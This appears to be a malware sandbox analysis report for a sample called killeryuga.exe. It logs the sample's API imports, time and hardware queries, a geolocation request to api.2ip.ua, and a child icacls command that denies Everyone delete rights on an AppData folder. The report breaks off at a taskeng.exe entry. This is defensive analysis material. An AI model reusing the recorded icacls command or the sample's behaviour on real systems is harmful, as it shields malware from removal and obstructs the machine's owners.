Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x76c335b7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x74d4cc89 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x75af1ace True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x75b14124 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x75b1232e True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x75b1555d True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x75af138a True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x75ae7590 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x75b1439f True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x7560503c True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x755feba1 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x755e6143 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x74f56c3c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x74f6011a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x74f7ed56 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77194100 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x74f63e75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x75f23fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75f5d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x75f21ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x75f01635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x75eff48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x74b53058 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x74b52f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x74b52dd6 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74b126e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x76c5828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x74f57136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x74d67144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75223eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75223ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75225dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75224af8 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75223f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75224642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7522fd6b True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74af9263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x75bc311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x74a9436b True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x74aa572c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749ec544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
System (257)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-03-24 16:36:12 (UTC) True 1
Fn
Get Time type = Ticks, time = 95488 True 1
Fn
Get Time type = Performance Ctr, time = 14672507109 True 1
Fn
Get Time type = System Time, time = 2019-03-24 16:36:15 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 15394848052 True 1
Fn
Get Time type = System Time, time = 2019-03-24 16:36:29 (UTC) True 1
Fn
Get Info type = Hardware Information True 249
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 467 bytes
Total Data Received 7.25 KB
Contacted Host Count 1
Contacted Hosts 77.123.139.189
HTTP Session #1
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.25 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 554 True 1
Fn
Data
Close Session - True 1
Fn
Process #3: icacls.exe
0 0
»
Information Value
ID #3
File Name c:\windows\syswow64\icacls.exe
Command Line icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:52, Reason: Child Process
Unmonitor End Time: 00:00:54, Reason: Self Terminated
Monitor Duration 00:00:02
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x98c
Parent PID 0x8e0 (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 990
0x 994
Process #4: taskeng.exe
0 0
»
Information Value
ID #4
